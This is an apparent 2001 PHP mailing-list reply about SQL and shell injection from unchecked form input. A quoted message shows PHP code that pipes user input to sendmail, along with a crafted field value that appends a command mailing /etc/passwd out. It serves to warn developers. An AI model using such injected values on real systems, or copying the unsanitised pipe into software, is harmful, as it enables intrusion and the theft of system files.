At 06:03 PM 12/20/2001 -0800, Philip Hallstrom wrote:
> > I've done something similar in the past just for kicks, and I got the same
> > result you did (i.e. an error).  I believe this is because mysql_query()
> > expects ONE query at a time and will break if you send two or more.  I
> > could be completely and totally wrong about that, though (someone please
> > correct me if I am)...
>Maybe this one failed, but it's always a good idea to check user input.
>Let's say you're emailing a form and you don't use the mail() function,
>but make a call directly to sendmail... and you're sloppy... so you do

True.  But we were speaking specifically about MySQL.  When you start 
toying with external programs and exec() and so forth then you've opened up 
a whole other can of worms security-wise...

>$fp = fopen("|/usr/bin/sendmail $sendto");
>#write stuff to pipe to send email...
>Now... what if when I filled out the form I set $sendto equal to this:
>[EMAIL PROTECTED]; /usr/bin/mail [EMAIL PROTECTED] < /etc/passwd

A definite possibility, but it does depend on the hacker in question 
knowing exactly how your script is written...

PHP General Mailing List (
To unsubscribe, e-mail: [EMAIL PROTECTED]
For additional commands, e-mail: [EMAIL PROTECTED]
To contact the list administrators, e-mail: [EMAIL PROTECTED]

Reply via email to